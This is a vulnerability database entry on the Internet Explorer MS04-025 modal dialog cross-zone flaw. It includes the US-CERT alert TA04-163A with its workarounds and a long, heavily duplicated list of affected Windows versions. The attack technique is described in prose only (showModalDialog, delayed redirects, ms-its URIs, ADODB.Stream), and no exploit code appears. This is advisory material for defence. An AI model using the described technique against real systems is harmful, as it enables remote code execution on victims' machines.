[原文]The WebBrowser ActiveX control, or the Internet Explorer HTML rendering engine (MSHTML), as used in Internet Explorer 6, allows remote attackers to execute arbitrary code in the Local Security context by using the showModalDialog method and modifying the location to execute code such as Javascript, as demonstrated using (1) delayed HTTP redirect operations, and an HTTP response with a Location: header containing a "URL:" prepended to a "ms-its" protocol URI, or (2) modifying the location attribute of the window, as exploited by the Download.ject (aka Scob aka Toofer) using the ADODB.Stream object.
[CNNVD]Microsoft Internet Explorer Modal Dialog区域绕过漏洞(MS04-025)(CNNVD-200408-049)
Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer存在漏洞允许跨区域访问,远程攻击者可以利用这个漏洞在本地电脑区域中执行恶意脚本。 攻击者可以构建传递一个动态建立的IFrame给Modal Dialog对象,并且这个对象调用通过Windows Script Encoder (screnc.exe)编码,诱使用户打开时,可造成以客户权限在本地域上下文执行恶意脚本,包括下载安装恶意程序。 这个漏洞也可导致访问外部域属性,允许其他类型的攻击如获得攻击者选择的敏感或私有信息。
Microsoft Internet Explorer Modal Dialog区域绕过漏洞(MS04-025)
危急
其他
2004-08-06 00:00:00
2005-10-20 00:00:00
远程
Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer存在漏洞允许跨区域访问,远程攻击者可以利用这个漏洞在本地电脑区域中执行恶意脚本。 攻击者可以构建传递一个动态建立的IFrame给Modal Dialog对象,并且这个对象调用通过Windows Script Encoder (screnc.exe)编码,诱使用户打开时,可造成以客户权限在本地域上下文执行恶意脚本,包括下载安装恶意程序。 这个漏洞也可导致访问外部域属性,允许其他类型的攻击如获得攻击者选择的敏感或私有信息。
Technical Cyber Security Alert TA04-163A - There is a cross-domain vulnerability in the way Microsoft Internet Explorer determines the security zone of a browser frame that is opened in one domain then redirected by a web server to a different domain.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Technical Cyber Security Alert TA04-163A
Cross-Domain Redirect Vulnerability in Internet Explorer
Original release date: June 11, 2004
Last revised: --
Source: US-CERT
Systems Affected
Microsoft Windows systems
Overview
A cross-domain vulnerability in Internet Explorer (IE) could allow an
attacker to execute arbitrary code with the privileges of the user
running IE.
I. Description
There is a cross-domain vulnerability in the way IE determines the
security zone of a browser frame that is opened in one domain then
redirected by a web server to a different domain. A complex set of
conditions is involved, including a delayed HTTP response (3xx status
code) to change the content of the frame to the new domain.
Vulnerability Note VU#713878 describes this vulnerability in more
technical detail and will be updated as further information becomes
available.
Other programs that host the WebBrowser ActiveX control or use the
MSHTML rendering engine, such as Outlook and Outlook Express, may also
be affected.
This issue has been assigned CVE CAN-2004-0549.
II. Impact
By convincing a victim to view an HTML document (web page, HTML
email), an attacker could execute script in a different security
domain than the one containing the attacker's document. By causing
script to be run in the Local Machine Zone, the attacker could execute
arbitrary code with the privileges of the user running IE.
Publicly available exploit code exists for this vulnerability, and
US-CERT has monitored incident reports that indicate that this
vulnerability is being actively exploited.
III. Solution
Until a complete solution is available from Microsoft, consider the
following workarounds.
Disable Active scripting and ActiveX controls
Disabling Active scripting and ActiveX controls in the Internet Zone
(or any zone used by an attacker) appears to prevent exploitation of
this vulnerability. Disabling Active scripting and ActiveX controls in
the Local Machine Zone will prevent widely used payload delivery
techniques from functioning. Instructions for disabling Active
scripting in the Internet Zone can be found in the Malicious Web
Scripts FAQ. See Microsoft Knowledge Base Article 833633 for
information about securing the Local Machine Zone. Also, Service Pack
2 for Windows XP (currently at RC1) includes these and other security
enhancements for IE.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages,
web forums, or internet relay chat (IRC) channels. While this is
generally good security practice, following this behavior will not
prevent exploitation of this vulnerability in all cases.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and
prevent some exploit attempts. Variations of exploits or attack
vectors may not be detected. Do not rely solely on anti-virus software
to defend against this vulnerability. More information about viruses
and anti-virus vendors is available on the US-CERT Computer Virus
Resources page.
Appendix B. References
* Vulnerability Note VU#713878-
<http://www.kb.cert.org/vuls/id/713878>
* Malicious Web Scripts FAQ -
<http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps>
* Computer Virus Resources -
<http://www.us-cert.gov/other_sources/viruses.html>
* CVE CAN-2004-0549 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0549>
* Microsoft Knowledge Base Article 833633 -
<http://support.microsoft.com/default.aspx?scid=833633>
* Windows XP Service Pack 2 RC1 -
<http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/wi
nxpsp2.mspx>
* Increase Your Browsing and E-Mail Safety -
<http://www.microsoft.com/security/incident/settings.mspx>
* Working with Internet Explorer 6 Security Settings -
<http://www.microsoft.com/windows/ie/using/howto/security/settings
.mspx>
_________________________________________________________________
Public incidents related to this vulnerability were reported by Rafel
Ivgi. Thanks to Jelmer for further research and analysis.
_________________________________________________________________
Feedback can be directed to the author: Art Manion.
Send mail to <mailto:cert@cert.org>.
Please include the Subject line "TA04-163A Feedback VU#713878".
_________________________________________________________________
Copyright 2004 Carnegie Mellon University.
Terms of use: <http://www.us-cert.gov/legal.html>
_________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA04-163A.html>
_________________________________________________________________
Revision History
June 11, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFAyhdcXlvNRxAkFWARAt2eAKCRDeqWLNgG+xXJtd0PyRGeN+S69ACfcXoi
GDMew8rDUjleel9OLMqs9W4=
=ZAyn
-----END PGP SIGNATURE-----
The discoverer of this issue is currently unknown. Rafel Ivgi, The-Insider and Jelmer provided a public analysis of the issue.
-
受影响的程序版本
Microsoft Internet Explorer 5.0.1 SP4
-
Microsoft Windows 2000 Advanced Server SP4
-
Microsoft Windows 2000 Datacenter Server SP4
-
Microsoft Windows 2000 Professional SP4
-
Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0
-
Microsoft Windows NT Workstation 4.0
-
Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP2
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0 SP1
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Enterprise Server 4.0
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP2
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0 SP1
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Server 4.0
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP2
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0 SP1
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Terminal Server 4.0
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP2
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0 SP1
-
Microsoft Windows NT Workstation 4.0
-
Microsoft Windows NT Workstation 4.0
-
Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 95
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98SE
-
Microsoft Windows 98SE
-
Microsoft Windows 98SE
+
Microsoft Windows ME
+
Microsoft Windows ME
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP6
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP5
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP4
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP6
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP5
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP4
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Enterprise Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP6
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP5
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP4
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP6
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP5
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP4
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Terminal Server 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP6
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP5
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP4
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
-
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server SP1
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Advanced Server
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server SP1
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Datacenter Server
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional SP1
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Professional
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server SP1
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Server
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP2
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services SP1
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 2000 Terminal Services
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98
-
Microsoft Windows 98SE
-
Microsoft Windows 98SE
-
Microsoft Windows 98SE
-
Microsoft Windows ME
-
Microsoft Windows ME
-
Microsoft Windows ME
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Enterprise Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Terminal Server 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
-
Microsoft Windows NT Workstation 4.0 SP6a
+
Microsoft Windows Server 2003 Datacenter Edition
+
Microsoft Windows Server 2003 Datacenter Edition
+
Microsoft Windows Server 2003 Datacenter Edition
+
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+
Microsoft Windows Server 2003 Enterprise Edition
+
Microsoft Windows Server 2003 Enterprise Edition
+
Microsoft Windows Server 2003 Enterprise Edition
+
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+
